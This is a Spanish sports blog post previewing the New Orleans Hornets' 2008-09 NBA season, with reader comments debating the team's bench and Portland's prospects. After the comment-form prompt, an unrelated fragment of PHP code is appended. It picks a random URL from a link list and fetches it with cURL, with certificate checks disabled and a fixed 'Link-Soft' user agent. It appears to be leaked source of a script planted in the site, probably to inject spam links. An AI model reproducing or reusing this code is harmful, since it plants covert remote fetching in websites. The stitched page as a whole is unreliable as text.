New Orleans Hornets: En buenas manos

08 de October de 2008 por MagicJohnson32

Propongo al lector que piense en tres franquicias en la Conferencia Oeste con mejores expectativas a corto y medio plazo que los Hornets. No las hay. Ahora, amplíe la búsqueda a toda la NBA. O no, mejor ahórrese el esfuerzo porque sigue sin haberlas. No abundan los equipos con un núcleo de jugadores que combinen talento y juventud, con sus tres principales estrellas nacidas después de 1980 y, desde luego, no son habituales tipos como Chris Paul.

cp

En su tercer año en la liga, la pasada temporada CP3 elevó su juego a nivel de MVP (finalizó segundo en las votaciones) con estadísticas extraordinarias: anotó 21.1 puntos por partido con cerca del 49% de acierto en tiros, y lideró la liga con medias de 11.6 asistencias y 2.7 recuperaciones. Estamos hablando de un jugador del que, con 23 años cumplidos durante los pasados Playoffs, ya se puede afirmar que es el mejor base de la NBA o, al menos, que lo fue durante chandlercpla 2007-2008. Paul es el líder, el icono, la avispa del escudo. Él lleva las riendas de los Hornets mientras el juego interior lo conforma una de las parejas más sólidas y completas de la liga, la formada por David West y Tyson Chandler.

Chandler ha pasado en apenas un par de temporadas de ser un jugador secundario y decepcionante en los Bulls, a ser el pilar defensivo de un equipo puntero. La pasada campaña ya demostró una mayor madurez, fue capaz de controlar mejor sus problemas con las faltas y supo aprovechar como nadie el juego junto a Chris Paul, especialmente en su característico pick & roll que Chandler finaliza con estruendosos mates. Pese a apenas colocar 1 tapón por partido, el 7 pies es uno de los mejores defensores interiores, un gran especialista en el rebote ofensivo (garantiza más de 4 rechaces en ataque por noche) y el equipo se resiente cuando no está en pista, ya que no cuenta con más recambios que Melvin Ely y Hilton Armstrong.

davidwestA su lado, o más bien un poco más lejos del aro, volverá a estar David West. El ala-pívot, una gran amenaza desde el poste medio, ya se ha ido esta temporada por encima de su mejor cifra anotadora en la NCAA, los 20.1 que obtuvo en su año senior en Xavier.  Su evolución es constante y por tercera temporada consecutiva ha mejorado sus estadísticas de anotación, rebotes y asistencias. El único punto negro llegó en Playoffs, cuando resurgieron los problemas físicos que parecían superados y se vio lastrado en ciertos momentos de la espectacular eliminatoria contra los Spurs.

Aquella derrota, consumada en un séptimo partido disputado en New Orleans y que supuso la única victoria visitante de toda la serie, dejó un regusto amargo a la mejor temporada en la historia de los Hornets. Fueron líderes del Oeste en diferentes ocasiones y sólo acabaron cediendo el primer puesto ante los Lakers tras la derrota de abril en el Staples Center. La posterior eliminación a manos de los Spurs es de esas experiencias que curten, de ésas que, bien administradas (y de eso se habrá ocupado Byron Scott), hacen crecer a todo el colectivo. Para empezar, este año nadie podrá decir que los Hornets llegarán a Playoffs sin experiencia, uno de sus principales puntos débiles -si no el principal-. En este sentido ayudará la llegada, a cambio de la mid-level, de James Posey, único jugador de la liga con 2 anillos en las últimas tres temporadas.

hornets5Es posible que Posey parta desde el banco, en una función de sexto hombre que ya ha demostrado que cumple a la perfección, y acabe jugando los minutos decisivos y formando un dúo letal desde la línea de 3 junto a Peja Stojakovic. El serbio, pese a reducir sensiblemente su media anotadora, se ha mantenido sano y ha firmado esta pasada temporada un espectacular 44% de acierto en triples. Si Stojakovic no baja el rendimiento, el principal perjudicado por la llegada de Posey será Morris Peterson, quien, pese a ser titular, no logró consolidarse como una pieza importante para Scott. Además, los Hornets han recuperado a Devin Brown, que tras su gris paso por los Cavs regresa al equipo en el que logró sus mejores actuaciones. El alero sophomore Julian Wight deberá confirmar las buenas sensaciones que dejó en el tramo final de la regular season, mientras que la rotación la completarán Ryan Bowen, Rasual Butler, Sean Marks y Mike James, quien llegó de la mano de Bonzi Wells procedente de Houston. Ambos corrieron la misma suerte: apenas contaron con oportunidades y, llegados los Playoffs, no fueron más que espectadores de lujo. James debería ganar algo de protagonismo ante la baja del emigrado Pargo y quedarse con los minutos que Paul descanse.

En definitiva, todo vuelve a quedar en manos del mismo entrenador y el mismo núcleo de jugadores liderados por Chris Paul, sin Pargo pero con Posey, sin una rotación de garantías pero con la valiosa experiencia ganada en el último año. New Orleans afronta la temporada 08-09 habiendo superado el trauma del Katrina, con la madurez que dan los años y los palos, y con fe ciega en el florenciente talento de un jugador enorme. Muchos quisieran estar en la posición de los Hornets.

Quinteto inicial: Chris Paul, Morris Peterson, Peja Stojakovic, David West y Tyson Chandler.

Sexto hombre: James Posey

Pronóstico: Finalista de Conferencia

Comenta

14 comentarios a esta entrada

  1. Noelinho dice:
    #1

    Lamentable que este artículo no haya sido un monográfico del gran Peja… :p

    Los Hornets son sin duda el equipo que más ganas tengo de ver este año, a ver si confirman lo visto hasta ahora y son capaces de meterse en la gran final, porque no?

      Citar

  2. TheDeerHunter dice:
    #2

    Suscribo punto por punto todo lo dicho en el artículo… lo único es que yo veo un banco demasiado escaso como para considerarlos como aspirantes claros al anillo.
    Todo puede ser, porque con CP3 son buenos de cojones… pero dudo que lleguen siquiera a la final de conferencia. Difícil lo van a tener, incluso, de hacerlo también como la temporada pasada.

      Citar

  3. TheDeerHunter dice:
    #3

    tan bien… quería decir

      Citar

  4. Txusma dice:
    #4

    Pues la baja de Pargo se puede notar pq era un auténtico microondas, capaz de revolucionarte el partido saliendo dsd el banco. En todo caso, el fichaje de Posey aporta, como dice el Analisis, ese grado de experiencia necesario en los momentos importantes. Este equipo podria llegar incluso a plantarse en la final.

      Citar

  5. Viva_Dirk dice:
    #5

    Suscribo lo que dice Magic, salvo que yo si confío en que Hilton Armstrong sea un buen suplente este año para NO.

      Citar

  6. Hynreck dice:
    #6

    La verdad es que pienso que no van a poder mantener el nivel del año pasado, como bien decis su banquillo le veo demasiado corto (Ryan Bowen? … por Dios…) y las lesiones pueden hacer visita en cualquier momento.
    Les veo cayendo en primera ronda de Playoffs (Toma ya, a ver si me trago las palabras)

      Citar

  7. Jabho dice:
    #7

    Yo no suscribo el análisis de Magic. Hay una franquicia que tiene mejor futuro a 3 años vista: Porland.

    En cuanto a NO dependen del nivel de Paul y el nivel de Paul es el que demostró el año pasado. No fue casualidad es que es muy bueno. Así que equipo muy a tener en cuenta. Yo veo 2 candiadtos al título en el este y 2 y medio en el Oeste… el medio son NO.

      Citar

  8. telekoman dice:
    #8

    Yo creo que para ser realmente favoritos en el Oeste necesitan algún movimiento durante la temporada que les dé algo de rotación. Si no van a llegar algo cascados. Y es como dice Jabho, la Final del Oeste de dentro de 2 años, NO – Portland.

      Citar

  9. MagicJohnson32 dice:
    #9

    Jabho, fíjate que digo que no hay 3 equipos en mejor situación. Los Blazers están en el grupo, claro.

      Citar

  10. Bend3r dice:
    #10

    Desde luego el equipo con mejores perspectivas de futuro es Portland. Un roster joven y bastante coral, donde Roy ya no es la estrella indiscutible. Este año va a ser muy divertido de ver, y sobre todo da la sensación que en un par de años van a sacar el rodillo y a aplastar a sus rivales. NO depende demasiado de Chris Paul.

      Citar

  11. TheDeerHunter dice:
    #11

    Buenas Bender y bienvenido.
    Ya hablaremos de Portland cuando toque… y vaya por delante que estoy de acuerdo que tiene una pinta muy buena
    Pero de ahí, a básicamente ponerlos como candidatos al título (simplemente comparándolos con NO, que lo es por méritos propios) tan sólo teniendo como base a un jugador que no ha tirado ni una sóla vez a canasta en la competición y ya empiezan a adivinársele problemas de peso pues…
    Sólo decir que en un par de años, precísamente tendrán que preocuparse de renovar o no a algunas de sus estrellas que acaban contrato y no es asunto baladí, por cierto…

      Citar

  12. nacho dice:
    #12

    ALGUIEN ME PODRIA DECIR QUE ES LO QE LE PASA A STOJAKOVIC QE LLEVA UN PAR DE SEMANAS SIN JUGAR??? TIENE ALGUNA LESION??

      Citar

  13. Jabho dice:
    #13

    Hola Nacho,

    Hay varias páginas que actualizan mas o menos la información sobre los lesionados. Te dejo una

    http://www.rotoworld.com/content/injuries.aspx?sport=NBA

    Según esto si, está day-to-day desde el 2 de Marzo.

      Citar

  14. nacho dice:
    #14

    muchass gracias por esto JABHO la verdad es que da gusto encontrar un sitio con gente que se ve que saben del tema…graciass

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>